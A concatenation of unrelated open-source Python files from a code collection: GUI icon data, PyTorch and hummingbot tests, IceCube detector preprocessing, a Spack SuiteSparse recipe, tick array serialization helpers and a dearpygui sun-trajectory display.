# THE SOFTWARE.
'''
base 64 encoded gif images for the GUI buttons
'''
class app_img:
format='gif'
data='''R0lGODlhEAAQAOeRACcLIiAbCSAjCjMdMzsfMjUkGUcmRjwwJ0YqRj4xJVwoUFguRkU2MS0/LzQ8
PC8/LzM+QTJCMDJCQTpCQCxIME1CIXQyYW48KTpLO1REPEpKSktKS01KSkpLSkxLTE1LS0VNUDtS
PD9PT0tMTExMTE1MTUxNTU1NTU5NTUFUQFFOTkZRU1BPTU9QUUVTVF9PO1JUVVRVSnlNMEVeRlZX
W1ZYVVZYWF5XVFBdUkpfX2RZXIZMgVtdX11eX1tfW1xfW1tfXqZEkFtgW2NfYWZgW2tdal9iXk9m
Z19iYk9pTqZIn5lNlU1rTp1XOF9lZVxnXF5oXlNrZ59eM1FzU1dyVcVItJJmSl5ycq1Wp1t0cLlU
tWB1eF52dmKBY12DX9RWwGN/f+RSzaVzTdNbxmaEhLlzRdFhs2WJZWeJZmOMZ7Z2UXGGhm2IiGqJ
iKV+VmuKimyKi26Ojm2ScnGQkGuWb22Wb3OTk+xp2+dr5eF73Pl154SfoMKYeIampoimptiYbPuB
8viD8I2sq/KJ7pOtrZGuruebbpGvr/+I/Ja1tdqrf9i3i/iweviwhP+zhf/Hif/Lpf//////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////yH5BAEKAP8ALAAAAAAQABAA
AAjRAP8JHEiwoMGBGk6MOChQgwYgEnJwcdGjoAYbIo5EyQIGjh02axyYIOjkSqI4bci8mdPnECEk
Ggi2WFHIj6A9WyDQgEFiYIcfKR5MAMHDhJAQTCLUIGgEQ5cZDZKgqUMnDRUfMQVu8ADFi5wzUyjg
KLEh6z8PCAZhGfIEBQALZgAtMUCwyI48Y6roQRToThglAzYMZEFkgRY8X4Io0CEgBkENByDxYUAg
QAU3jB6JKUBQxYtFigw5avSnjBQZN8wKTGBFTZMLGRwy/Mfhg2qCAQEAOw=='''
class shp_img:
format='gif'
data='''R0lGODlhEAAQAMIFABAQEIBnII+HgLS0pfDwsC8gIC8gIC8gICH5BAEKAAcALAAAAAAQABAAAAND
eLrcJzBKqcQIN+MtwAvTNHTPSJwoQAigxwpouo4urZ7364I4cM8kC0x20n2GRGEtJGl9NFBMkBny
HHzYrNbB7XoXCQA7'''
class dir_img:
format='gif',
data='''R0lGODlhEAAQAMZUABAQEB8QEB8YEC8gIC8vIEA4ME9IQF9IIFpTSWBXQHBfUFBoj3NlRoBnII9v
IIBwUGB3kH93YIZ5UZ94IJB/YIqAcLB/EI+IcICHn4+HgMCHEI6Oe4CPn4+PgMCQANCHEJ+PgICX
r9CQANCQEJ+XgJKanaCgkK+fgJykoaKjo7CgkKimk+CfIKKoo6uoleCgMLCnkNCnUKuwpLSvkrSv
mfCoMLWyn7+wkM+vcLS0pfCwML+4kPC3QNDAgM+/kPDAQP+/UODIgP/IUODQoP/QUPDQgP/QYP/P
cPDYgP/XYP/XcP/YgPDgkP/ggP/gkPDnoP/noPDwoPDwsP/woP//////////////////////////
////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////yH5
BAEKAH8ALAAAAAAQABAAAAe1gH+Cg4SFhoQyHBghKIeEECV/ORwtEDYwmJg0hikLCzBDUlJTUCoz
hZ4LKlGjUFBKJiQkIB0XgypPpFBLSb2+toImT643N5gnJ7IgIBkXJExQQTBN1NVNSkoxFc9OMDtK
vkZEQjwvDC4gSNJNR0lGRkI/PDoNEn8gRTA+Su9CQPM1PhxY8SdDj2nw4umowWJEAwSCLqjAIaKi
Bw0WLExwcGBDRAoRHihIYKAAgQECAARwxFJQIAA7'''
class xls_img:
format='gif'
data='''R0lGODlhEAAQAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/
/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm
AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/
MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm
ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/
mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm
zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/
/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ
AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA
M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ
ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A
mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z
zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///ywAAAAAEAAQAAAIngBfuUKF
ipBBg4MS9umTJYsrBAheSZwokGBBhwgeaNzIUSOhLKgydhz5EdWrB4oOelT5kdDJLwgUKRpEKOUX
Gtpannzw5ZVNQje15czicmNPg1lwCtW5EeirQV+IEtI2iOjOmh9dQc2SimqWQa4efGzYcGZUr4NQ
ddSWimwWr33UahRKly61qn0Iza1rl9qXKVIPIkyY8Mtft4gTTwkIADs='''
class xsl_img:
format='gif'
data='''R0lGODdhEAAQAOMPAAAAAAAAgAAAmQAA/zNmmQCAgDNm/zOZAIaGhjOZ/zPM/8DAwKbK8DP///Hx
8f///ywBAAAADwAQAAAEWBDJSeW76Or9Vn4f5zzOAp5kOo5AC2QOMxaFQcrP+zDCUzyNROAhkL14
pEJDcQiMijqkIXEYDIsOXWwU6N5Yn5VKpSWYz2fwRcwmldFo9bidhc3Hrrw+HwEAOw=='''
class log_img:
format='gif'
data='''R0lGODlhEAAQAIQQAG9s0oJ5eatyP6tycpePj6ulP6ulctWeOaulpdWentXSOcvHx9XS0v/MzP//
zP///y8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gICH5BAEK
ABAALAAAAAAQABAAAAViICSOUNMwjEOOhyIUyhAbzMoAgJAQi9EjtRGAIXgUjw9CUDR8OJ9OJakJ
fUqFjCSBZ11CqNWkt7ndLqLjbFg8zZa5bOw6znSfoVfm3clYIP5eEH4EAQFlCAsrEH2ICygoJCEA
Ow=='''
| 1.367188 | 1 |
chmp/src/chmp/torch_utils/_test_bayes.py | chmp/misc-exp | 6 | 16965 | import torch
import pytest
# NOTE: also registers the KL divergence
from chmp.torch_utils import NormalModule, WeightsHS, fixed
def test_kl_divergence__gamma__log_normal():
p = torch.distributions.LogNormal(torch.zeros(2), torch.ones(2))
q = torch.distributions.Gamma(torch.ones(2), torch.ones(2))
torch.distributions.kl_divergence(p, q)
def test__module_parameters():
module = NormalModule(loc=torch.zeros(1), scale=fixed(torch.ones(1)))
assert {k for k, _ in module.named_parameters()} == {"loc"}
module = NormalModule(loc=torch.zeros(1), scale=torch.ones(1))
assert {k for k, _ in module.named_parameters()} == {"loc", "scale"}
module = NormalModule(torch.zeros(1), scale=fixed(torch.ones(1)))
assert {k for k, _ in module.named_parameters()} == {"loc"}
def test__module_fixed_parameters_optimize():
module = NormalModule(torch.zeros(1), fixed(torch.ones(1)))
optimizer = torch.optim.Adam(module.parameters(), lr=0.1)
for _ in range(100):
optimizer.zero_grad()
x = module.rsample((20,))
loss = torch.mean((x - 2.0) ** 2.0)
loss.backward()
optimizer.step()
assert float(module.loc) != pytest.approx(0.0)
assert float(module.scale) == pytest.approx(1.0)
def test_weight_hs_api():
w = WeightsHS([10, 20, 30], tau_0=1e-5)
assert w().shape == (10, 20, 30)
assert w.kl_divergence().shape == ()
| 2.203125 | 2 |
test/hummingbot/core/utils/test_fixed_rate_source.py | BGTCapital/hummingbot | 3,027 | 16966 | <filename>test/hummingbot/core/utils/test_fixed_rate_source.py
from decimal import Decimal
from unittest import TestCase
from hummingbot.core.utils.fixed_rate_source import FixedRateSource
class FixedRateSourceTests(TestCase):
def test_look_for_unconfigured_pair_rate(self):
rate_source = FixedRateSource()
self.assertIsNone(rate_source.rate("BTC-USDT"))
def test_get_rate(self):
rate_source = FixedRateSource()
rate_source.add_rate("BTC-USDT", Decimal(40000))
self.assertEqual(rate_source.rate("BTC-USDT"), Decimal(40000))
def test_get_rate_when_inverted_pair_is_configured(self):
rate_source = FixedRateSource()
rate_source.add_rate("BTC-USDT", Decimal(40000))
self.assertEqual(rate_source.rate("USDT-BTC"), Decimal(1) / Decimal(40000))
def test_string_representation(self):
self.assertEqual(str(FixedRateSource()), "fixed rates")
| 2.796875 | 3 |
src/graphnet/models/detector/icecube.py | kaareendrup/gnn-reco | 0 | 16967 | import torch
from torch_geometric.data import Data
from graphnet.components.pool import group_pulses_to_dom, group_pulses_to_pmt, sum_pool_and_distribute
from graphnet.data.constants import FEATURES
from graphnet.models.detector.detector import Detector
class IceCube86(Detector):
"""`Detector` class for IceCube-86."""
# Implementing abstract class attribute
features = FEATURES.ICECUBE86
def _forward(self, data: Data) -> Data:
"""Ingests data, builds graph (connectivity/adjacency), and preprocesses features.
Args:
data (Data): Input graph data.
Returns:
Data: Connected and preprocessed graph data.
"""
# Check(s)
self._validate_features(data)
# Preprocessing
data.x[:,0] /= 100. # dom_x
data.x[:,1] /= 100. # dom_y
data.x[:,2] += 350. # dom_z
data.x[:,2] /= 100.
data.x[:,3] /= 1.05e+04 # dom_time
data.x[:,3] -= 1.
data.x[:,3] *= 20.
data.x[:,4] /= 1. # charge
data.x[:,5] -= 1.25 # rde
data.x[:,5] /= 0.25
data.x[:,6] /= 0.05 # pmt_area
return data
class IceCubeDeepCore(IceCube86):
"""`Detector` class for IceCube-DeepCore."""
class IceCubeUpgrade(IceCubeDeepCore):
"""`Detector` class for IceCube-Upgrade."""
# Implementing abstract class attribute
features = FEATURES.UPGRADE
def _forward(self, data: Data) -> Data:
"""Ingests data, builds graph (connectivity/adjacency), and preprocesses features.
Args:
data (Data): Input graph data.
Returns:
Data: Connected and preprocessed graph data.
"""
# Check(s)
self._validate_features(data)
# Preprocessing
data.x[:,0] /= 500. # dom_x
data.x[:,1] /= 500. # dom_y
data.x[:,2] /= 500. # dom_z
data.x[:,3] /= 2e+04 # dom_time
data.x[:,3] -= 1.
data.x[:,4] = torch.log10(data.x[:,4]) / 2. # charge
#data.x[:,5] /= 1. # rde
data.x[:,6] /= 0.05 # pmt_area
data.x[:,7] -= 50. # string
data.x[:,7] /= 50.
data.x[:,8] /= 20. # pmt_number
data.x[:,9] -= 60. # dom_number
data.x[:,9] /= 60.
#data.x[:,10] /= 1. # pmt_dir_x
#data.x[:,11] /= 1. # pmt_dir_y
#data.x[:,12] /= 1. # pmt_dir_z
data.x[:,13] /= 130. # dom_type
return data
class IceCubeUpgrade_V2(IceCubeDeepCore):
"""`Detector` class for IceCube-Upgrade."""
# Implementing abstract class attribute
features = FEATURES.UPGRADE
@property
def nb_outputs(self):
return self.nb_inputs + 3
def _forward(self, data: Data) -> Data:
"""Ingests data, builds graph (connectivity/adjacency), and preprocesses features.
Args:
data (Data): Input graph data.
Returns:
Data: Connected and preprocessed graph data.
"""
# Check(s)
self._validate_features(data)
# Assign pulse cluster indices to DOMs and PMTs, respectively
data = group_pulses_to_dom(data)
data = group_pulses_to_pmt(data)
# Feature engineering inspired by Linea Hedemark and Tetiana Kozynets.
xyz = torch.stack((data['dom_x'], data['dom_y'], data['dom_z']), dim=1)
pmt_dir = torch.stack((data['pmt_dir_x'], data['pmt_dir_x'], data['pmt_dir_x']), dim=1)
charge = data['charge'].unsqueeze(dim=1)
center_of_gravity = sum_pool_and_distribute(xyz * charge, data.batch) / sum_pool_and_distribute(charge, data.batch)
vector_to_center_of_gravity = center_of_gravity - xyz
distance_to_center_of_gravity = torch.norm(vector_to_center_of_gravity, p=2, dim=1)
unit_vector_to_center_of_gravity = vector_to_center_of_gravity / (distance_to_center_of_gravity.unsqueeze(dim=1) + 1e-3)
cos_angle_wrt_center_of_gravity = (pmt_dir * unit_vector_to_center_of_gravity).sum(dim=1)
photoelectrons_on_pmt = sum_pool_and_distribute(data['charge'], data.pmt_index, data.batch).floor().clip(1, None)
# Add new features
data.x = torch.cat((
data.x,
photoelectrons_on_pmt.unsqueeze(dim=1),
distance_to_center_of_gravity.unsqueeze(dim=1),
cos_angle_wrt_center_of_gravity.unsqueeze(dim=1),
), dim=1)
# Preprocessing
data.x[:,0] /= 500. # dom_x
data.x[:,1] /= 500. # dom_y
data.x[:,2] /= 500. # dom_z
data.x[:,3] /= 2e+04 # dom_time
data.x[:,3] -= 1.
data.x[:,4] = torch.log10(data.x[:,4]) / 2. # charge
#data.x[:,5] /= 1. # rde
data.x[:,6] /= 0.05 # pmt_area
data.x[:,7] -= 50. # string
data.x[:,7] /= 50.
data.x[:,8] /= 20. # pmt_number
data.x[:,9] -= 60. # dom_number
data.x[:,9] /= 60.
#data.x[:,10] /= 1. # pmt_dir_x
#data.x[:,11] /= 1. # pmt_dir_y
#data.x[:,12] /= 1. # pmt_dir_z
data.x[:,13] /= 130. # dom_type
# -- Engineered features
data.x[:,14] = torch.log10(data.x[:,14]) / 2. # photoelectrons_on_pmt
data.x[:,15] = torch.log10(1e-03 + data.x[:,15]) / 2. # distance_to_center_of_gravity
return data | 2.21875 | 2 |
tests/routes_parsing/test1.py | hellojoechip/bambleweeny | 22 | 16968 | <filename>tests/routes_parsing/test1.py
import re
t1 = 'Data !@[value1] and also !@[system:uptime] testing.'
print("Content: " + t1)
if re.search('!@\[[_a-zA-Z0-9:]*\]', t1):
print("YES")
else:
print("NO")
o = re.sub('!@\[[_a-zA-Z0-9:]*\]', '_B9yPrsE_\\g<0>_B9yPrsE_', t1)
o2 = o.split("_B9yPrsE_")
for i in o2:
if i.startswith("!@["):
i2 = re.sub('[^\w:]', "", i)
print("Parse: " + str(i) + " " +str(i2))
else:
print("Plain: '" + str(i) + "'")
| 2.90625 | 3 |
internal/notes/builtin-SAVE/packages/suite-sparse/package.py | HPCToolkit/hpctest | 1 | 16969 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by <NAME>, <EMAIL>, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class SuiteSparse(Package):
"""
SuiteSparse is a suite of sparse matrix algorithms
"""
homepage = 'http://faculty.cse.tamu.edu/davis/suitesparse.html'
url = 'http://faculty.cse.tamu.edu/davis/SuiteSparse/SuiteSparse-4.5.1.tar.gz'
version('4.5.5', '0a5b38af0016f009409a9606d2f1b555')
version('4.5.4', 'f6ab689442e64a1624a47aa220072d1b')
version('4.5.3', '8ec57324585df3c6483ad7f556afccbd')
version('4.5.1', 'f0ea9aad8d2d1ffec66a5b6bfeff5319')
variant('tbb', default=False, description='Build with Intel TBB')
variant('pic', default=True, description='Build position independent code (required to link with shared libraries)')
variant('cuda', default=False, description='Build with CUDA')
variant('openmp', default=False, description='Build with OpenMP')
depends_on('blas')
depends_on('lapack')
depends_on('metis@5.1.0', when='@4.5.1:')
# in @4.5.1. TBB support in SPQR seems to be broken as TBB-related linkng
# flags does not seem to be used, which leads to linking errors on Linux.
depends_on('tbb', when='@4.5.3:+tbb')
depends_on('cuda', when='+cuda')
patch('tbb_453.patch', when='@4.5.3:+tbb')
# This patch removes unsupported flags for pgi compiler
patch('pgi.patch', when='%pgi')
def install(self, spec, prefix):
# The build system of SuiteSparse is quite old-fashioned.
# It's basically a plain Makefile which include an header
# (SuiteSparse_config/SuiteSparse_config.mk)with a lot of convoluted
# logic in it. Any kind of customization will need to go through
# filtering of that file
pic_flag = self.compiler.pic_flag if '+pic' in spec else ''
make_args = [
'INSTALL=%s' % prefix,
# By default, the Makefile uses the Intel compilers if
# they are found. The AUTOCC flag disables this behavior,
# forcing it to use Spack's compiler wrappers.
'AUTOCC=no',
# CUDA=no does NOT disable cuda, it only disables internal search
# for CUDA_PATH. If in addition the latter is empty, then CUDA is
# completely disabled. See
# [SuiteSparse/SuiteSparse_config/SuiteSparse_config.mk] for more.
'CUDA=no',
'CUDA_PATH=%s' % (spec['cuda'].prefix if '+cuda' in spec else ''),
'CFOPENMP=%s' % (self.compiler.openmp_flag
if '+openmp' in spec else ''),
'CFLAGS=-O3 %s' % pic_flag,
# Both FFLAGS and F77FLAGS are used in SuiteSparse makefiles;
# FFLAGS is used in CHOLMOD, F77FLAGS is used in AMD and UMFPACK.
'FFLAGS=%s' % pic_flag,
'F77FLAGS=%s' % pic_flag,
# use Spack's metis in CHOLMOD/Partition module,
# otherwise internal Metis will be compiled
'MY_METIS_LIB=%s' % spec['metis'].libs.ld_flags,
'MY_METIS_INC=%s' % spec['metis'].prefix.include,
# Make sure Spack's Blas/Lapack is used. Otherwise System's
# Blas/Lapack might be picked up. Need to add -lstdc++, following
# with the TCOV path of SparseSuite 4.5.1's Suitesparse_config.mk,
# even though this fix is ugly
'BLAS=%s' % (spec['blas'].libs.ld_flags + (
'-lstdc++' if '@4.5.1' in spec else '')),
'LAPACK=%s' % spec['lapack'].libs.ld_flags,
]
# SuiteSparse defaults to using '-fno-common -fexceptions' in
# CFLAGS, but not all compilers use the same flags for these
# optimizations
if any([x in spec
for x in ('%clang', '%gcc', '%intel')]):
make_args += ['CFLAGS+=-fno-common -fexceptions']
elif '%pgi' in spec:
make_args += ['CFLAGS+=--exceptions']
if '%xl' in spec or '%xl_r' in spec:
make_args += ['CFLAGS+=-DBLAS_NO_UNDERSCORE']
# Intel TBB in SuiteSparseQR
if 'tbb' in spec:
make_args += [
'SPQR_CONFIG=-DHAVE_TBB',
'TBB=-L%s -ltbb' % spec['tbb'].prefix.lib,
]
make('install', *make_args)
| 1.640625 | 2 |
tick/array/serialize.py | andro2157/tick | 0 | 16970 | <reponame>andro2157/tick<filename>tick/array/serialize.py
# License: BSD 3 clause
import os
import numpy as np
import scipy
from tick.array.build.array import (
tick_float_array_to_file,
tick_float_array2d_to_file,
tick_float_sparse2d_to_file,
tick_double_array_to_file,
tick_double_array2d_to_file,
tick_double_sparse2d_to_file,
tick_float_array_from_file,
tick_float_array2d_from_file,
tick_float_sparse2d_from_file,
tick_double_array_from_file,
tick_double_array2d_from_file,
tick_double_sparse2d_from_file,
)
def serialize_array(array, filepath):
"""Save an array on disk on a format that tick C++ modules can read
This method is intended to be used by developpers only, mostly for
benchmarking in C++ on real datasets imported from Python
Parameters
----------
array : `np.ndarray` or `scipy.sparse.csr_matrix`
1d or 2d array
filepath : `str`
Path where the array will be stored
Returns
-------
path : `str`
Global path of the serialized array
"""
if array.dtype not in [np.float32, np.float64]:
raise ValueError('Only float32/64 arrays can be serrialized')
if array.dtype == "float32":
if isinstance(array, np.ndarray):
if len(array.shape) == 1:
serializer = tick_float_array_to_file
elif len(array.shape) == 2:
serializer = tick_float_array2d_to_file
else:
raise ValueError('Only 1d and 2d arrays can be serrialized')
else:
if len(array.shape) == 2:
serializer = tick_float_sparse2d_to_file
else:
raise ValueError('Only 2d sparse arrays can be serrialized')
elif array.dtype == "float64" or array.dtype == "double":
if isinstance(array, np.ndarray):
if len(array.shape) == 1:
serializer = tick_double_array_to_file
elif len(array.shape) == 2:
serializer = tick_double_array2d_to_file
else:
raise ValueError('Only 1d and 2d arrays can be serrialized')
else:
if len(array.shape) == 2:
serializer = tick_double_sparse2d_to_file
else:
raise ValueError('Only 2d sparse arrays can be serrialized')
else:
raise ValueError('Unhandled serrialization type')
serializer(filepath, array)
return os.path.abspath(filepath)
def load_array(filepath, array_type='dense', array_dim=1, dtype="float64"):
"""Loaf an array from disk from a format that tick C++ modules can read
This method is intended to be used by developpers only, mostly for
benchmarking in C++ on real datasets imported from Python
Parameters
----------
filepath : `str`
Path where the array was stored
array_type : {'dense', 'sparse'}, default='dense'
Expected type of the array
array_dim : `int`
Expected dimension of the array
Returns
-------
array : `np.ndarray` or `scipy.sparse.csr_matrix`
1d or 2d array
"""
abspath = os.path.abspath(filepath)
if not os.path.exists(filepath):
raise FileNotFoundError('File {} does not exists'.format(abspath))
if dtype == "float32":
if array_type == 'dense':
if array_dim == 1:
reader = tick_float_array_from_file
elif array_dim == 2:
reader = tick_float_array2d_from_file
else:
raise ValueError('Only 1d and 2d arrays can be loaded')
elif array_type == 'sparse':
if array_dim == 2:
reader = tick_float_sparse2d_from_file
else:
raise ValueError('Only 2d sparse arrays can be loaded')
else:
raise ValueError('Cannot load this class of array')
elif dtype == "float64" or dtype == "double":
if array_type == 'dense':
if array_dim == 1:
reader = tick_double_array_from_file
elif array_dim == 2:
reader = tick_double_array2d_from_file
else:
raise ValueError('Only 1d and 2d arrays can be loaded')
elif array_type == 'sparse':
if array_dim == 2:
reader = tick_double_sparse2d_from_file
else:
raise ValueError('Only 2d sparse arrays can be loaded')
else:
raise ValueError('Cannot load this class of array')
else:
raise ValueError('Unhandled serrialization type')
return reader(filepath)
| 2.734375 | 3 |
__init__.py | bbockelm/glideinWMS | 0 | 16971 | __all__=["factory","frontend","lib","tools","creation","install","unittests"]
| 1.023438 | 1 |
views/menuVisualizacaoGeral.py | iOsnaaente/Tracker-solar-Supervisorio | 2 | 16972 | import dearpygui.dearpygui as dpg
import datetime as dt
import math
from registry import *
SUN_DATA.update_date()
# FUNCTIONS
def get_semi_circle_points( center, radius, angle_i, angle_f, segments = 360, closed = False ):
points_close = [[ center[0], center[1]-radius ] , center, [ center[0] + radius, center[1] ] ]
angles = [ ((angle_f - angle_i)/segments)*n for n in range(segments) ]
points = [ [ center[0] + radius*math.cos(ang), center[1] - radius*math.sin(ang) ] for ang in angles ]
if closed:
points_close.extend( points )
return points_close
else:
return points
def draw_sun_trajetory( draw_id, parent_id, all_day = False, extremes = False ):
# Ponto central, dimensões da tela e Raio
width, height = dpg.get_item_width( draw_id ), dpg.get_item_height( draw_id )
center = [ width//2, height//2 ]
r = width//2 - 20 if width+20 <= height else height//2 - 20
id_link = draw_id*100
# DESENHO DA LINHA DE NASCER DO SOL E POR DO SOL
azi = SUN_DATA.get_pos_from_date( SUN_DATA.rising )[1]
alt = SUN_DATA.get_pos_from_date( SUN_DATA.sunset )[1] # [ alt , azi ]
# PEGA OS ANGULOS NOS PONTOS DA TRAJETÓRIA DO SOL
dots = SUN_DATA.trajetory(100, all_day )
# PONTOS DE ACORDO COM Azimute - Altitude
dots = [ [ x - math.pi/2 , y ] for x, y, _ in dots ]
dots = [ [ center[0] + math.cos(x)*r, center[1] + math.sin(x)*math.cos(y)*r ] for x, y in dots ]
# DESENHO DO SOL NA SUA POSIÇÃO
sun = [ SUN_DATA.azi - math.pi/2, SUN_DATA.alt ]
sun = [ center[0] + math.cos(sun[0])*r, center[1] + math.sin(sun[0])*math.cos(sun[1])*r ]
dpg.draw_line( parent = draw_id, tag = id_link+1 , p1 = [center[0] - r, center[1]] , p2 = [center[0] + r, center[1]] , color = COLOR['gray'](155) , thickness = 1 )
dpg.draw_line( parent = draw_id, tag = id_link+2 , p1 = center , p2 = [center[0] + r*math.cos(azi-math.pi/2), center[1] + r*math.sin(azi-math.pi/2)], color = COLOR['orange'](155), thickness = 2 )
dpg.draw_line( parent = draw_id, tag = id_link+3 , p1 = center , p2 = [center[0] + r*math.cos(alt-math.pi/2), center[1] + r*math.sin(alt-math.pi/2)], color = COLOR['gray'](200) , thickness = 2 )
dpg.draw_circle( parent = draw_id, tag = id_link+4 , center = center , radius = r , color = COLOR['white'](200) , fill = COLOR['white'](10 ), thickness = 3 )
dpg.draw_circle( parent = draw_id, tag = id_link+5 , center = center , radius = 3 , color = COLOR['white'](200) , fill = COLOR['white'](255), thickness = 2 )
dpg.draw_text( parent = draw_id, tag = id_link+6 , pos = [center[0] -(r +20), center[1] -10 ] , text = 'W' , color = COLOR['white'](200) , size = 20 )
dpg.draw_text( parent = draw_id, tag = id_link+7 , pos = [center[0] +(r +5) , center[1] -10 ] , text = 'E' , color = COLOR['white'](200) , size = 20 )
dpg.draw_text( parent = draw_id, tag = id_link+8 , pos = [center[0] -10 , center[1] -(r +25)], text = 'N' , color = COLOR['white'](255) , size = 20 )
dpg.draw_polyline( parent = draw_id, tag = id_link+9 , points = dots , color = COLOR['red'](155) , thickness = 2 , closed = False )
for n, p in enumerate(dots):
dpg.draw_circle( parent = draw_id, tag = id_link+(12+n) , center = p , radius = 2 , color = [n*4, 255-n*2, n*2, 255] )
dpg.draw_line( parent = draw_id, tag = id_link+10 , p1 = center, p2 = sun, color = COLOR['yellow'](200) , thickness = 2 )
dpg.draw_circle( parent = draw_id, tag = id_link+11 , center = sun , radius = 10 , color = COLOR['yellow'](155) , fill = COLOR['yellow'](255) )
def update_sun_trajetory( draw_id, parent_id, all_day = False ):
# Ponto central, dimensões da tela e Raio
width, height = dpg.get_item_width( draw_id ), dpg.get_item_height( draw_id )
w, h = dpg.get_item_width( 'mainWindow' ) , dpg.get_item_height('mainWindow' )
center = [ width//2, height//2 ]
r = width//2 - 20 if width+20 <= height else height//2 - 20
id_link = draw_id*100
# DESENHO DA LINHA DE NASCER DO SOL E POR DO SOL
azi = SUN_DATA.get_pos_from_date( SUN_DATA.rising )[1]
alt = SUN_DATA.get_pos_from_date( SUN_DATA.sunset )[1] # [ alt , azi ]
# PEGA OS ANGULOS NOS PONTOS DA TRAJETÓRIA DO SOL
dots = SUN_DATA.trajetory(100, all_day )
dots = [ [ x - math.pi/2 , y ] for x, y, _ in dots ]
dots = [ [ center[0] + math.cos(x)*r, center[1] + math.sin(x)*math.cos(y)*r ] for x, y in dots ]
# DESENHO DO SOL NA SUA POSIÇÃO
sun = [ SUN_DATA.azi - math.pi/2, SUN_DATA.alt ]
sun = [ center[0] + math.cos(sun[0])*r, center[1] + math.sin(sun[0])*math.cos(sun[1])*r ]
# DESENHO ESTÁTICO
dpg.configure_item( id_link+1 , p1 = [center[0] - r, center[1]], p2 = [center[0] + r, center[1]] )
dpg.configure_item( id_link+2 , p1 = center , p2 = [center[0] + r*math.cos(azi-math.pi/2), center[1] + r*math.sin(azi-math.pi/2)] )
dpg.configure_item( id_link+3 , p1 = center , p2 = [center[0] + r*math.cos(alt-math.pi/2), center[1] + r*math.sin(alt-math.pi/2)] )
dpg.configure_item( id_link+4 , center = center , radius = r )
dpg.configure_item( id_link+5 , center = center , radius = 3 )
dpg.configure_item( id_link+6 , pos = [center[0] - (r + 20), center[1] -10 ] )
dpg.configure_item( id_link+7 , pos = [center[0] + (r + 5), center[1] -10 ] )
dpg.configure_item( id_link+8 , pos = [center[0] - 10 , center[1] - (r + 25) ] )
dpg.configure_item( id_link+9 , points = dots )
dpg.configure_item( id_link+10, p1 = center , p2 = sun )
dpg.configure_item( id_link+11, center = sun )
for n, p in enumerate(dots):
dpg.configure_item( id_link+(12+n) , center = p )
def att_sunpos_graphs( ):
last_date = SUN_DATA.date
if not dpg.get_value( HORA_MANUAL ): SUN_DATA.set_date( dt.datetime.utcnow() )
else: SUN_DATA.set_date( dt.datetime( dpg.get_value(YEAR), dpg.get_value(MONTH), dpg.get_value(DAY), dpg.get_value(HOUR), dpg.get_value(MINUTE), dpg.get_value(SECOND) ) )
azi_alt = SUN_DATA.trajetory( 50, all_day = False )
SUN_DATA.set_date( last_date )
AZI = []
ALT = []
PTI = []
for azi, alt, tim in azi_alt:
AZI.append( math.degrees(azi - math.pi) if azi > math.pi else math.degrees(azi + math.pi) )
ALT.append( math.degrees(alt) if alt < math.pi else 0 )
PTI.append( int( dt.datetime.timestamp( tim )) )
azi, alt = [math.degrees(SUN_DATA.azi)], [math.degrees(SUN_DATA.alt)]
time_scrt = [math.degrees(dt.datetime.timestamp( last_date ))]
SUN_DATA.set_date( last_date )
dpg.configure_item (22_13, x = PTI , y = AZI )
dpg.configure_item (22_14, x = time_scrt, y = azi )
dpg.set_axis_limits(22_11, ymin = PTI[0] , ymax = PTI[-1] )
dpg.configure_item (22_23, x = PTI , y = ALT )
dpg.configure_item (22_24, x = time_scrt, y = alt )
dpg.set_axis_limits(22_21, ymin = PTI[0] , ymax = PTI[-1] )
